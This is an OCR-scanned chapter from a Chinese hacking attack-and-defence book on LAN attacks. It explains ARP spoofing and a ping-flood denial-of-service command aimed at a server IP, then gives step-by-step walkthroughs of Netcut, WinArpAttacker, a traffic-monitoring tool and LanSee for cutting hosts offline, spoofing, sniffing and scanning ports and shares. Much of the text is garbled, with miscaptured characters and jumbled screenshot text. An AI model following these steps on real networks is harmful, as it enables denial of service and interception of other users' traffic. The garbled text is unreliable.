IP 地 址 和 MAC 地 址 实现 ARP 欺骗 ， 可 在 网 络 中 产生 大 量 的 ARP 通信 数据 ， 使 网 络 系统 
传输 发 生 阻 杏 。 如 果 攻 击 者 持续 不 断 地 发 出 伪造 的 ARP 啊 应 包 ， 就 能 更 改 目标 主机 ARP 
绥 存 中 的 IP-MAC 地 址 ， 造 成 网 络 遭 受 攻击 或 中 断 。 

3. Ping 潜水 攻击 

Windows 提供 一 个 Ping 程序 ,使 用 它 可 以 测试 网 络 是 否 连 接 ，Ping 洪水 攻击 也 称 为 
ICMP 入 侵 ， 它 是 利用 Windows 系统 的 漏洞 来 入 侵 的 。 在 命令 行 中 运行 命令 “ping -1 
65500 -ft 192.168.0.1”，192.168.0.1 是 局 域 网 服务 器 的 IP 地 址 ， 这 样 就 会 不 断 地 癌 服务 
发 送 大 量 的 数据 请 求 , 如 果 局 域 网 内 的 计算 机 很 多 , 且 同 时 都 运行 了 命令 “ping -1 65500 
-t 192.168.0.1”， 服务器 将 会 因 CPU 使 用 率 居 融 不 下 而 朋 沉 ,这 种 攻击 方式 也 称 DoS 攻 
击 〈 拒 绝 服 务 攻 击 )， 即 在 一 个 时 段 内 连续 癌 服 务 器 友 出 大 量 请 求 ， 服 务 器 因 来 不 及 加 
应 而 死机 。 

4， 了 嗅 探 

局 域 网 是 黑客 进行 监听 嗅 探 的 主要 场所 。 黑 客 在 局 域 网 内 的 一 个 主机 、 网 关上 安装 监 
听 程 序 ， 束 可 以 监听 出 整个 局 域 网 的 网 络 状态 、 数 据 流 动 、 传 输 数据 等 信息 。 因 为 一 般 情 
况 下 ， 用 户 的 所 有 信息 ， 例 如 账号 和 和 密码， 都 是 以 明文 的 形式 在 网 络 上 传输 的 。 目 前 ， 可 
以 在 局 域 网 中 进行 噢 探 的 工具 很 多 ， 如 Sniffer 等 。 


14.2 ”局域网 攻击 曝光 


墨客 可 以 利用 专门 的 工具 来 攻击 整个 局 域 网 , 例如 使 局 域 网 中 两 台 计 算 机 的 IP 地 址 发 
生 神 突 ， 从 而 导致 其 中 的 一 侣 计算 机 无 法 上 网 。 所 以 ， 了 解 黑客 攻击 局 域 网 的 方式 ， 提 前 
做 好 预防 工作 很 有 必要 。 














































































































14.2.1{ 网 络 剪 刀 手 Netetlt 切断 网 络 连接 曝光 


网 络 剪 切 手 Netcut 工具 可 以 切断 局 域 网 里 任何 主机 使 其 断 开 网 络 连 接 。 利 用 ARP 
协议 ， 同 时 也 可 以 看 到 局 域 网 内 所 有 主机 的 IP 地 址 。 还 可 控制 本 网 段 内 任意 主机 对 外 
网 的 访问 ， 随 意 开 局 或 关闭 其 Internet 访问 权限 ， 而 访问 内 部 LAN 其 他 机 器 不 存在 任 
何 问 题 。 


该 工具 的 有 具体 使 用 步 又 虐 光 如 下 。 
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STEP01: 打开 “Netcut” 主 窗口 STEP02: 选择 网 卡 


1 
f 
ttansic La Fast Ethernet Controller [Microsofts 


E 
| 


[TSTSTITITSTITETITETSTH 


浆 卡 信息 

奖 趟 ttanaic EZ2Fast Ethernet Controlerlhticrasolts Packet 
Schedulen 

物理 地 址 : [00:1E:8C:17:B0:85] 

PHNYESEESEFSS00 

网关 -92168:30 生 





自动 搜索 当前 网 段 内 所 有 主机 较 单 击 "选择 国 选择 搜索 计算 机 及 发 送 单 击 “ 确 定 ” 


的 IP 地 址 、 计 算 机 名 及 MAC 地 址 。 网 卡 ” 按 钮 。 数据 包 所 使 用 的 网 卡 。 按钮 。 
STEP03: 关闭 局 域 网 对 网 关 的 访问 STEP04: 开 尼 局 域 网 对 网 关 的 访问 


thn 
引 相 引 引 相 引 了 引 相 相让 下 本 加 





在 选中 IP 地 址 为 192.168.0.8 的 主机 后 ， 单 击 “ 切 ”再 次 选中 IP 地 址 为 192.168.0.8 的 主机 , 单 击 "恢复 ” 
断 ” 按 钮 ,使 该 主机 的 “ 开 / 关 ”状态 变 为 “ 关 ”, 此 按钮， 该 主机 的 “ 开 / 关 ”状态 又 重新 变 为 “ 开 ”， 


时 该 主机 不 能 访问 网 关 ， 也 不 能 打开 网 页 。 此 时 该 主机 可 以 访问 Internet 网 络 。 
STEP05: 快速 查看 主机 信息 STEP06: 打开 “查找 ”对 话 框 





192,1583,0.,8 





在 “Netcut” 主 窗口 中 单 击 “查找 ”按钮 。 在 文本 框 中 输入 要 查找 主机 的 某 个 信息 ， 这 里 输入 
iP 地址， 单 击 “查找 ”按钮 。 


29] 











RD > 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


STEP07: 返回 主 窗 口 STEP08: 查看 局 域 网 中 主机 的 信息 


al slslslalslslaslasl sl.al a Ll 
| | | 





查找 到 的 IP 地 址 为 辆 单 击 “打印 表 ” 按 钮 。 查看 所 在 局 域 网 中 所 有 主机 的 MAC 地 址 、IP 地 址 、 
192.168.0.8 的 主机 信息 。 用 户 名 等 信息 。 


STEP09: 返回 主 界 面 


选择 某 全 主机 后 ， 单 击 国 去 按 钮 ， 即 可 将 该 IP 地 址 
添加 到 “网 关 IP” 列 表 中 ， 即 可 成 功 将 该 主机 的 IP 地 
址 设置 成 网 关 IP 地 址 。 


al alaslaslalslaslaslaslskhal lt 





14.2.2 ”局域网 ARP 攻击 工具 WinArpAttacker 明基 


WinArpAttacker 是 一 于 在 网 络 中 进行 ARP 欺骗 攻击 的 工具 , 并 使 被 攻击 的 主机 无 法 正 
常 与 网 络 进行 连接 。 此 外 ， 它 还 是 一 款 网 络 噢 探 (监听 ) 工具 ， ee 网 
关 等 对 象 ， 也 可 进行 反 监 听 ， 扫 描 局 域 网 中 是 否 存在 监听 。 有 具体 的 操作 步骤 曝光 如 下 。 
STEP01: 安装 并 运行 “WinArpAttacker” STEP02: 打开 “Scan” 对 话 框 


i Unt:led - WinArpatiocker 3,72 duild 2007 04.34 
,Fle Scan Attack Detect Opticrs Visw Help 


上 旦 吕 幅 车] 入 -六 由 区 二 且 旺 | 号 易 


人 Im | Livelp bo 














Scan TartEe 一 


| 
© Scan a range |192 .168 .26 .1 192 .168 . 26 .254 


i Scan local networks 





192 168 261 1B8. 2B. 1 255 255 255 0 | 255.:255;0 
192. 188. 18B0. 1 255.255.255:0 
192. 188. 1. 10 255. 255.255.0 


[¥ Hormal scan 太 AnmtisniEE scan 








单 击 工具 栏 上 的 “Scan” 按 钮 ， 可 扫描 出 局 域 网 中 ” 国 设置 扫描 范围 并 色 选 ” 国 单 击 “Scan” 按钮 。 
的 所 有 主机 。 此 处 依次 单 击 “Scan”> “Advanced” ”要 扫描 的 IP 地 址 。 
选项 。 
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STEP03: 选择 绑 定 的 网 卡 和 1IP 地 址 


Adapter httack | Update | Detect | Analysis | Proxy hrp | Protect | 





-Select a Hetwork Device 


[mwars Virtual Ethernet Mdapte ”| 


192.168. 26. 1 

2 255.2550 
00-50-56-C0O-00-08 
0.0.0.0 
00-00-00-00-00-00 


hdapter 
Description 
IF hddress 
Subnet Mask 
Mac Address 
Gateway IPF 


Gateway Mac 
DNS 


Peap |\Device\HEF_{4CE14355-CBA46-4CF4-9Bl12-15BDBTCEE1BA} 











在 主 界面 选择 “Options”> 喘 若 安装 有 多 块 网 
“Adapter” 沫 单 命 令 。 卡 , 则 可 在 此 选择 绑 
定 的 网 卡 和 1IP 地 址 。 


STEP05: 切换 至 “Update” 选 项 卡 


Adapter | Attack Update | meteet | Analysis | Proxy Arp | Protect | 


IP List Update 





[¥ huto scan the lan for new computer or status. 


Auto scannine interval (1-60) 6 Himtes 


[w Updatel IF list from IF-MAC pairs when sniffing. 





| [w TCF kource [I¥ TCP destination 








国 设置 自动 扫描 的 时 间 
间隔 等 。 


STEP07: 切换 至 “Analysis” 


国 单 击 “确定 ”按钮 。 


选项 卡 


Adapter | Attack | Update | Detect Pnalysis |Proxy hrp | Frotect | 





-nalysis Setup 


Jw Save all arp packets to file for analysis. 


File [rp_packets. bin RS | 








国 指定 保存 ARP 数 据 包 ” 辆 单 击 “ 确 定 ” 按 钮 。 
文件 的 名 称 与 路 径 。 











局 域 网 攻防 


STEP04: 设置 网 络 攻击 的 各 种 选项 


hdapter httack | Update | Detect | hnalysis | Froxy Arp | Frotect | 


httack Time Setup 
hrp flood times (1l-10,000,000) 





aa es times 
FE | minutes 
FE | minutes 
本 

-| mirnites 


Pp -| minutes 
Pp = minutes 


F 3 minutes 


Ban to gateway (1-200) 

IF conflict (1-200) 

hrp spoof the eateway (1l-200) 
hrp spoof hosts (1-200) 

hrp spoof lantl-200) 


hrp Spoof Interval (1-200) 











除 Arp flood times 是 次 数 外 ， 
持续 时 间 是 0 表示 不 停止 。 


其 他 都 是 持续 时 间 ， 


STEP06: 切换 至 “Detect” 选项 卡 


hdapter | httack | Update Detect | alysis | Proxy Arp | Frotect | 
Detect Setup 


[w Begin to detect as soon as this program starts. 





When the Speed that a host sends arp_request packets 
exceeds a certain one ll-200pps), this action is regarded 
a5 arp ScCannineg. 


四 加 Packetsrs 


Within what interval we can gather hany same events as 
sinele event. 


Bao Ea seconds (1-1800) 








园 设置 检测 的 频率 等 。 辆 单 击 “确定 ”按钮 。 


STEP08: 切换 至 “Proxy Arp” 选项 卡 


hdapter | httack | Update | Detect | Aralysis Froxy Mrp |Protect | 





-Proxy Mrp 


JJw Enable Proxy Arp function. 


When one host kequest the mac address of another inexsit 
or offline host,T will tell it a certain mac address. 


Mac address 
位 This host 
人 Gateway 








-hrp packet srd mode 


I should send arp reply 
Packet whenl regquested 
host 15 


i hny hostt 
f Out of hbst list 


人 Customize 


|o0-50-56-C0-00-08 























启用 代理 Arp 功 能 。 ” 辆 单 击 “ 确 定 ”按钮 。 
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取 Pe > 
关 肛 攻防 从 入 门 到 精通 
全 人 人 他 


STEP09: 切换 至 “Protect” 选项 卡 STEP10: 返回 主 界面 





Adapter | Attack | Update | Detect | Analysis | Proxy hrp Frotect | File Scan Attack Detect 2 View rT 
Protect Setup 


[I¥ Enable local anti-spoof protect | One Times/ 6 -| 二 |s D 已 量 RY - 
pen Save can ad 


When a host’s physical address in local arp entry Was 





chaneed, maybe someone 15 spoofing you. Winhrphttacker I 
will recover it with host list’ s address automatically. 了 Address Mac Address | Flood 


Winhrphtitacker will also tell eateway correct mac address | 
of local host reeularlylone times every 1-BD second, 口 192.168.1.1 00-50-56-C0-0 BanGateway 


0 dom t do so] 
0 这 host carn be immne from mary 192.168.1.4 90-2B-34-03-7 IP Conflict 
arp-spoof attacks. 口 192.168.1.10 90-2B-34-09-7 > 


口 192.168.1.100 90-28-34-09-7 Sniff Gateway 


When Winhrphtitacker detects arp-spoof attack [Attack Spoof 
,httack Spoof Bar Access), it will recover victims” arp Sniff Hosts 
entry based on host 11ist. Sniff Lan 


工 you enable i+ you can protect some hosts from tp- spoof 
attack, but all arp, attacks arlsed by you will be in vain 
because remote host s arp entry will be recovered by 


确定 取消 应 用 心 ) | 
启用 本 地 和 远程 防 。 辆 单 击 “确定 ” 按钮 。 选取 攻击 目标 后 ， 单 击 “Attack” 按 钮 右 侧 的 下 拉 
欺骗 保护 功能 。 按钮 ， 选 择 攻击 方式 。 单 击 “Stop” 按 钮 ， 被 攻击 
的 主机 恢复 正常 连接 状态 。 
如 果 使 用 了 噢 探 攻 击 ， 则 可 单 击 “Detect” 按 钮 开始 噢 探 。 单 击 “Save” 按 钮 ， 可 将 主 
机 列表 保存 下 来 ， 再 单 击 “Open” 按 钮 ， 即 可 打开 主机 列表 。 如 果 用 户 对 ARP 包 的 结构 比 
较 熟 悉 ， 了 解 ARP 攻击 鼠 理 ， 则 可 目 己 动手 制作 攻击 包 ， 单 击 “Send” 按 钮 进行 攻击 。 

















”AmpsQ 是 该 主机 发 送 的 ARP 请 求 包 的 个 数 ; ArpSP 是 该 主机 发 送 的 回应 包 的 个 
提示 。 数 ; ArpRQ 是 该 主机 接收 的 请 求 包 的 个 数 ; ArpRP 是 该 主机 接收 的 回应 包 的 个 数 。 





14.2.3 ”网 络 特工 监视 数据 曝光 


网 络 特工 可 以 监视 与 主机 相连 HUB 上 所 有 机 器 收发 的 数据 包 ; 还 可 以 监视 所 有 局 域 网 
内 的 机 器 上 网 情况 ， 以 对 非法 用 户 进 行 管 理 ， 并 使 其 登录 指定 的 IP 网 址 。 

使 用 网 络 符 工 的 具体 操作 步 又 曝光 如 下 。 
STEP01: 打开 “网 络 特工 ” 主 窗口 STEP02: 打开 “选项 ”对 话 框 
国 Kennear - 网 络 等 工 选项 (Se 
文件 (日 一 一 工具 (TD 帮助 (H) 启动 杂项 


厂 操作 系统 启动 时 自动 运行 程序 lv 退出 程序 时 需要 密码 验证 
lv 程序 自动 时 显示 系统 托盘 图 标 jy 不 显示 广告 霹 要 重新 运行 程序 ) 
lv 程序 启动 时 显示 主 窗口 三 启动 时 不 显示 程序 L060 














; Dlx 加 bod 
< 二 [3 [Cy 
日- 我 的 网 下 网 卡 宪 称 pe ‘Device\HPF {AESCDBS... 
时 he Sl FCI] | pg 卡 摘 玉 htheros AR8151 FCI-E... VirtualBox Host-Dnly... 
902B340970DD 08002700E8CA 








192. 168. 56. 1 
255. 255. 255.0 
0.0.0.0 





192 188.1.1 





显示 /隐藏 主 窗口 热 键 : Etzl + Shift + 各 +t + 了 


全 局 热 键 
| 厂 热 键 显示 主 窗口 时 需要 密码 验证 


一 软件 机 
互联 星空 











报警 声音 设置 


浏览 ‘Users\ADNINI 1\AppData\Local ‘TempRar$EXaD. 2 


cuea | 





设置 启动 和 全 局 热 键 等 属性 后 , 单 击 “ok” 按 钮 。 
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STEP03: 返回 “网 络 特工 ” 主 窗口 








长 屋 | 物 硅 训 1 HM 
90253409700D->6C210MB9AEB6 上 
90283409700D->6C210 生 9AEB6 上 


2014-09-16 

| |2014-09-16 

A : BC210ABIAE BG- ee a 以 术 必 

[9 .5.46 BSBCL210A89A 290 9TD0D _ 忆 文 

9028340970DD- >6C21DA69iEBB 
SC210A69APEB6->9D283409T70DD 上 儿 
EC210A59AE 防 -290283409T00D Lb 
9028340970DD-2>6C210MBO9AEB6 上 上 
SC210A89AFB6->90283409700D 以 


.| 互联 星空 
白 Vir talBoa Host-On] 


eb 


-对 十 诗 点 | 
盖 软件 检测 

| 到 
= 
Q02B3409700D->8C210A89AEBE 上 
BC210AB9AEB6->902B3409T0DD Lb 
902B3409700D->333300010002 此 


Wy 


RE 





协 计 波 : 全 mw PIT NIC INF 

三 I 省 0 - : 万 茜 口 过 洒 
教 据 包 过 于 字符 种 : 

局 人 避让 点 视 数 据 着 广 件 
从 文件 该 取 数 据 : 


单 击 可 上 视 " 后 ， 图 右 击 “网 络 管 
在 右 侧 设置 监视 内 容 , 单 hi 添 
击 开始 监视 按钮 。 ”加 新 网 段 "命令 。 








STEP05: 返回 “网 络 特 工 ” 主 窗口 


大 Kennear - 网 络 竺 工 

文件 (日 “得 考 (V) 工具 (T) 帮助 {H) 

省 扣 | 

日 下 网 


辐 - 人 os ARB1IS1 FCI~E Gigabit Fthern 网 段 结束 IF 


四 十 键 点 击 添加 网 段 ) 网 段 网 关 苹 地址 
i 二 阿 段 192. 168.1.2 - 192.168.1.: 
-软件 检测 
| ”一 互联 星空 
白 - Ee Host-Dnly Ethernet Adap 


人 咏 建 点 击 添加 网 段 ) 
次 多 测 











1 直人 
192. 168.1.253 
255:255:2255:0 
192. 168.1.1 


查看 新 添加 的 网 段 并 双击 该 网 段 。 


STEP07: 打开 “网 段 和 参数 设置 ”对 话 框 


使 用 虚拟 IP 地 址 : [82.168. 1. 19] 网 络 带 帘 : | 32 KB/S 

管理 主机 频率 : 一 一 一 上 一- 每 10.000 种 一 次 “管理 路 由 频 亭 : 

繁 略 

厂 不 自动 扫描 了 网 段 
CEBo | 

在 jo 

提示 EER 

厂 全 部 选择 厂 全 部 选择 
厂 上 线 提 示 厂 更 换 wAc 地 址 提示 厂 上 线 日 志 
厂 下 线 提 示 厂 管 ?里 提示 厂 下 线 日 志 


对 各 个 网 络 参数 进行 设置 ， 然 





ly 保护 自己 不 被 其 它 软 件 管理 上 网 。 厂 锁定 网 关 M 
分 钟 后 未 从 被 管理 主机 收 到 任何 数据 ,或 者 。 Iv 主机 抵抗 宣 有 
分 钟 后 恢复 正常 管理 第 略 . 

















后 单 击 “OK ”按钮 。 





局 域 网 攻防 


STEP04: 打开 “添加 新 网 段 ” 对 话 框 
添加 新 网 各 
网 段 开 始 匡 地 址 : Ea .166 
了 网 段 结 束 IF 地 址 : 192 . 168 
网 段子 网 撞 码 : 25 .5 
网 段 较 天 亚 地 址 : l9e .168 


ee 


设置 网 络 的 开始 iP 地址、 结束 IP 地 址 、 子 网 掩 码 、 
网 关 IP 地 址 之 后 , 单 击 “Ok” 按钮 。 





STEP06: 查看 设置 网 段 的 所 有 信息 


国 Kennear - 网 拘 千 工 
| 文件 (月 ”查看 (V) 工具 (TD 帮助 (H) 











日 . 的 RI 卡 
日 人 es AB3151 PCI-E 


i [sR 
: | R192.160.1.4 
| 软件 检测 


在 线 2014-09-16 13:37:43.803 


i 一 
和 vir re Host-Only 


| Se 十 键 点 击 ; 
192 168.1.15 
192. 168.1.1 

192. 160 1 17 


2014-09-16 13:37:43.975 


yn nn 





LW 





: 192.168.1.2 在 线 : 4 
: 192 188 1 25° 离线 : 248 
2.255.255. 管理 : 0 


: 192.168.1.1 设置 防水 雯 贡 m | 


单 击 “ 管 理 参数 
设置 ”按钮 。 


:建新 天 摘 5% 自 
| 


网 址 映射 列表 





查看 设置 网 段 的 
人 


STEP08: 返回 STEP06 窗口 


太 Kennear - 网 络 竺 工 
| 文人 (查看 (工具 (帮助 (H) 











于 我 的 网 下 
日 Atheros AR3151 PCI-E 


; “二 数据 监视 在 线 2014-09-16 13:37:43.6803 
: EF rt (名 点 击 


白 . VirtualBox Host-Drniy 
i . 米 hr+ 民 ' 


数据 监视 
网络 管理 右键 点击 
“软件 检测 


4| WW 


网 段 开始 I? 地 址 ; 
网 段 结束 I 地 址 ; 
网 段子 网 摘 码 : 


单 击 ,两 下 映射 列表 ， 护 钥 - 





192. 168.1.2 
192. 168. 1. 25: 
255.255.255.C 
192. 188.1.1 
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取 


Py 


STEP09: 打开 “网 址 映射 列表 ”对 话 框 


输入 要 解析 的 网 址 (不 要 输入 http: /人 : 
en Kenne ar. com 服务 器 返回 信息 : 
请 点 击 选择 DNS 服务 器 : 


超 Hj 时 间 : [o 


网 址 映射 列表 : 
要 梓 有 和 区 
其 它 全 部 了 网址 


wer omnes com 不 
大 ' " 9 


选中 要 解析 的 DNS 服务 器 后 ， 单 击 “ 开 始 解析 按 


钮 。 


STEP11: 返回 “网 络 特 工 ” 主 窗口 


硬 Kennear - 网 兴 千 工 


> 
攻防 从 入 门 到 精通 











时 2014-09-16 13:37:43.803 


192. 168. 1. 14 
m | 
网 段 开 始 IF 地 址 :192. 168. 1.2 在 线 : 蒜 f 章 新 天 挡 网 禾 
网 段 结 束 TF 地 址 :192. 166.1. 25: 高 线 : ”246 
网 段子 网 撞 码 : 255. 255.255.[ 管理 : 0 官 理 均 数 设 置 


Kgf2py 关 IP 节 ;192. 168.1.1 设置 防水 境 规 刚 网 址 陵 射 列表 
网 有 RP 关 NAC 地 扯 : 8C210AB9AEB8 _R3 | 





广告 位 招租 : 





单 击 “互联 星空 ”选项 。 


STEP13: 打开 “端口 扫描 参数 设置 ”对 话 框 


IF 版 本 : | 协议 类 型 : [er -| 厂 显示 扫描 进 度 
起 始 IF: |182. 168.1.2 
结束 IF: |192. 168. 1. 253 es | 


人 |0-65535 < 


[= 
交 , 


不 沁 < 常用 端口 | 


隐蔽 性 
使 用 IC 地 址 3028340970DD (大写 ) 
和 IT 地 址 [is2.168110 进行 扫描 


十 束 |P 后 





设置 起 始 IP 和 结 , 单 击 "常用 端口 ”按钮 。 
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STEP10: 对 选中 的 DNS 服务 器 进行 解析 








输入 要 解析 的 网 址 (下 要 输入 http:72): 


eth 二 的 Er 加 千 教 ， 爱 权 信 息 教 ， 附 加 信息 数 0 


m2 站 kennear. com 


ww. kernear. c 
i ee ee ee 117 


也 射 TP 对 应 下 
和 时 1.10 本 地 HTTP 服 务 
ww. kennear, com 下、 WHW. Kermne ar. com 
双击 此 处 输入 要 被 映射 的 P39 赴 (不 要 输入 前 纺 http: /7 双击 此 处 输入 映射 IP (WY4) 双击 此 处 输入 映射 TP 对 应 | 


待 解 析 完 毕 后 ， 可 看 到 该 域名 对 应 的 主机 地 址 等 属 
性 ， 然 后 单 击 “OK” 按 钮 。 


超时 时 间 : ho ” 秘 


STEP12: 打开 “互联 星空 ”窗口 


夸 Kennear - 网 络 符 工 
文件 (日 _ 诗 EV I 上 MD “帮助 (H) 
| 遇 Gm| 人 | 
:olx| 二 
日 -我 的 阿 卡 
[Ss Mher s AR3151 PCI-E ps 
| |- 娄 据 监视 
日 网络 管 理 i 
i | -网 段 192.166.1 
| -软件 检测 
| :互联 星空 
日 Virtalox Host-0my 
-数据 监 
一 闪 绽 定理 届 角 点击 
:- 较 件 检测 
让 








所 内 Dt 且 兴 抱 Ee 





可 进行 扫描 端口 和 DHCP 服 务 操作 。 在 列表 中 选择 


“端口 扫描 ”选项 后 ， 单 击 “ 开 始 ”按钮 。 


STEP14: 查看 常用 的 端 


IF 版 本 : [wa 了 | 协议 类 型 : [rcz | 厂 显示 扫描 进度 
起 始 IF: |192. 168.1.2 

OK | 
结束 IF: [192. 168. 1. 253 

Cancel | 


SS 21, 23, 25, 53, 80, 110, 135- 
本 ||139, 161, 443, 8010, 8080 





隐藏 性 一 
使 用 脲 [地址 130253d40370ID 


和 IF 地 址 【19z.165.1.10 进行 扫描 





常用 的 端口 显示 在 “端口 列表 ”文本 框 内 , 单 击 “OK” 


按钮 。 


-< 第 14 章 
局 域 网 攻防 


STEP15: 进行 扫描 端口 操作 STEP16: DHCP 服务 扫描 操作 


六 Kennear - 网 络 等 工 
| 文件 (PR 剖 夏 (WI 工具 (TD 帮助 (H) 











EE 





; 9 一 LE 能 涡 明 
日 拱 4 池 提 EE 日 搬 下 村 谤 口 二 EE 





Ee mo 站 让 下 让 下 a 务 扫 湛 二 可 站 DP 引 6 全 域 ,并 取得 一 个 未 被 使 用 的 I? 地 | 


13: 44:52 开 向 扫描 TP 中 和 .7 的 王 剧 TS 服务 避 
IF 为 192. 168. .1.7 站 夫 机 全 在 Di 服务 继 I (2); i114. 114. 4 114 
13: 44:53 开始 扫 朱 IF 为 192 1.6 的 主机 HCz 扫 掏 任 务 充 成 
IP 为 192. 166.1.6 的 主机 不 在 线 ! i ne 各 
和 44:54 i 192 lee. 1.9 的 主机 .. 来 自 于 IF7: 
IP 为 192. 搓 1 机 不 在 # 上 人 "92, 168. 1.108 
13:44:55 和 ls i 1. 10 的 主机 ..， 
IF 为 192. 瑞 F 10 的 土 由 I?; ee 
13: 44:56 开始 扫描 TJ? 为 A 168. 11 的 主机 ... : 12. 125.81.6 
1 192. 168. 1.11 的 主机 不 在 绪 ! NS IF (2): 114.114.114.114 
开始 扫描 TP 为 192. 168. 1 12 的 主机 . . 完 | 


ee 来 自 时 : 3 
前 已 IP 志 训 ge 168. 1.106 
13: 44:59 和 192 156 1.14 的 主机 ... ee nit 
IF 为 192. 185.1.14 的 主机 不 在 线 ! 路 由 IP: 192.168.1.1 
13:45:00 开始 洋芋 为 192. L686. 二 15 的 主机 ... ] 亚 服务 时 开 (1): 123.125.81.6 
-->IP 为 192.188.1.15 的 主机 135 庙 口 开 族 ! 二 2 114. idd. 11d.114 
-->T? 为 192.1866.1.15 的 主机 i 庙 口 开 it! eT » 











在 扫描 的 同时 ， 扫 描 结果 显示 在 “日 志 ”列表 中 ， 选择 “DHCP 服务 扫描 ”选项 后 ， 单 击 “ 开 始 ” 技 
在 其 中 可 看 到 各 个 主机 开启 的 端口 。 钮 ， 即 可 进行 DHCP 服务 扫 和 


14.3 局域网 监控 工具 


利用 专门 的 局 域 网 合 看 工具 可 以 但 看 局 域 网 中 各 个 主机 的 信息 ， 在 本 市 将 介绍 两 球 非 
单方 便 实 用 的 局 域 网 得 看 工具 。 











14.3.1 Lansee 工具 


针对 机 房 中 的 用 户 经 常 误 设 工作 组 、 随意 更 改 计 算 机 名 、IP 地 址 和 共享 文件 夹 等 情况 ， 
ee LanSee 非常 方便 地 实现 监控 ， 既 可 以 迅速 排除 故障 ， 又 可 以 解决 
一 些 潜在 的 安全 隐患 。 

1. 搜索 计算 机 

LanSee 是 一 款 主要 用 于 对 局 域 网 (Internet 上 也 适用 ) 上 各 种 信息 进行 查看 的 工具 ， 采 
用 多 线程 技术 ， 将 局 域 网 上 比较 实用 的 功能 完美 地 融合 在 了 一 起 ， 功 能 十 分 强大 。 

使 用 LanSee 工具 搜索 计算 机 的 共 体 操作 步骤 曝光 如 下 。 


STEP01: ， 打开“ 局域网 查看 工具 ” 主 窗口 STEP02: 选择 搜索 范围 


二 局 域 网 查 春 工 具 (LanSee) V1. 72[ 床 注册 ] 
| 设置 | 任务 音 看 (V) | 组 件 帮助 (H) 























-一 一 -一 = 搜索 共 起 始 IF 段 结束 I? 段 
于 | | 192. 168.1 192. 168.1 


E 扫 摘 S 192. 168. 160 192. 168. 160 
组 件 管理 | 级 击 ] 网 络 嗅 探 192. 168. 26 192. 168. 26 
文件 来 路 径 





et 

起 始 IF 段 回 发 送 AF? 请 求 

结束 IF 段 超时 (ms) 300 

| 渗 加 
L 保存 ] 


























选择 “设置 ”>“ 工 具 选 项 ”菜单 命令 。 在 “搜索 计算 机 ”选项 卡 中 设置 局 域 网 内 的 搜索 范围 
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攻防 从 入 门 到 精通 


STEP03: 切换 至 “搜索 共享 文件 ”选项 卡 ”STEP04: 切换 至 “扫描 端口 ”选项 卡 





二 让 搜索 计算 机 二 搜索 计算 机 

秽 搜 索 共享 文件 索 共 享 IF 地 址 端口 

到 局 域 网 陡 天 192. 168.1 139 

多, 扫 扬 庙 品 登 ; 扫 撕 端 品 192. 168.1.8 445. . 1024 














文件 类 型 要 地 址 端口 
文件 大 小 0 超时 押 s) 2000 添加 是 除 | | 清空 | 


























输入 文件 类 型 后 单 击 “ 添 加 ”按钮 ， 添 加 新 的 文件 闫 加 所 要 扫描 的 痛 口 后 ， 单 击 “保存” 按钮。 
格式 


STEP05: 返回 “局 域 网 查看 工具 ” 主 窗 口 STEP06: ”打开 搜索 的 计算 机 并 与 其 进行 连接 


六 局域网 坦 春 工具 (LanSee) V1.72[ 未 注册 ] Eel x 
设置 任务 吝 帮 (VW) 组 件 帮助 (H) 


向 纪 | 如 和 | 日 


工具 选项 工具 显示 | 任务 浏览 结束 任务 | 组 件 管理 更 新 升级 | 《退出 


入 局 域 网 查看 工具 (LanSee) V1.72[ 未 注册 ] 
设置 作 备 _ 吝 碍 VW 组件“ 帮助 (H) 


入 Bu 和 | 日 所 | 生 


工具 选项 工具 显示 览 组 件 管理 更 新 升级 | 《 返 出 


[as 
~ 


控 索 计算 机 


MAC 地 址 
192. 168. 1.10 90. 28. 34. 09. 70. ID 
上 192. 168. 1.1 8C. 21. OA. 89. AE. B6 
192. 168. 1. 55 90. 2B. 34. 09. 76. F4 
192. 168. 1. 88 C8. 60. 00. 78. 56. FE 
192. 168. 1. 100 | 90. 28. 34. 09. 70. 49 
im Nn op 34_nm Im oo 





所 在 的 计算 机 “| 所 在 的 目录 


192.168.1.88 \\192, 168.1 
ents 192.168.1.88 $ 只 | \\192. 163. 1 . 
et Profes... 192.168.1.88 1T0027., JPG \\192, 168. 1. 


192.188. 1.88 AW1T0047. JPG M192, 168.1，~ 


WORKGROUP 


“Se® 12 es 188. 1. 100 WORKGROUP 


La 蕊 no ieo 1 no 1 WiDr DM 
bd Ui 


主机 蕊 测 








» 


ictures 
«| <« Ln | 一 
搜索 隐藏 共享 资源 | 使 用 说 明 
7:36:46]| 人 8 和 机 "AN : ^ 


37:15] 


T: 二 
法 lL 到 
| a 和 人 

















所 在 的 计算 机 
192. 168.1.88 
192. 168.1. 88 
192. 168. 1. 88 
192. 168.1. 88 


上 
J 颖 得 数 =0, 等 待 任务 数 =0 当前 窗口 ; 搜索 计算 机 本 机 名称 ; 4L8QD1ETPGKV51W , 本 














单 击 “ 开 始 ” 按钮 ， 即 开始 搜索 。 在 选 先 定 的 |P 地 址 上 右 击 ， 选择 “打开 计算 机 ”命令 。 


STEP07: 输入 用 户 名 和 密码 
Windows 安全 


输入 网 络 密 码 
粒 入 您 的 密码 来 连接 到 : 192.168.1.102 


EE 输入 用 户 名 和 密码 后 单 击 “ 确 定 ” 按 钮 ， 即 可 与 此 


域 : 4L8QD1ETPGKV51W 计算 机 建立 连接 。 
同 记 住 我 的 任 据 


插入 智能 卡 


二 登录 失败 : 未 知 的 用 户 名 或 错误 密码 。 


CJ Co 
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2. 搜索 共享 资源 

共 孚 资源 往往 是 局 域 网 数据 泄密 的 “ 徘 魁 向 首 ”， 网 管 要 经 第 检 和 碍 局 域 网 中 是 人 否 存 
在 一 些 不 必要 开放 的 共 孚 资产， 在 得 看 到 不 安全 因素 后 ， 要 及 时 通知 开放 共 孕 的 用 户 
将 其 关闭 。 

在 LanSee 主 窗口 中 单 击 “开始 ”按钮 ， 搜 索 出 IP 地 址 后 ， 紧 接 看 会 搜索 共享 资源 ， 
在 共享 资源 列表 框 中 可 以 看 到 每 台 计 算 机 开放 的 共享 资源 。 


入 局 域 网 查看 工具 (LanSee) V1.72[ 未 注册 ] 
| 设置 任务 过 看 V) 组 件 帮助 (H) 
甸 | 剖 | B © | 

工具 选项 工具 显示 | 任务 浏览 结束 任务 | 组 件 管理 更 新 升级 | ”退出 
IF 地 址 计算 机 名 工作 组 NAC 地 址 用 户 名 
二 192. 168.1.10 90. 28. 34. 09.70.DD 

声 192. 168.1.1 8C. 21. 0A. 89. AE. BS 

192. 168. 1.55 90. 2B. 34. 09. 76. F4 

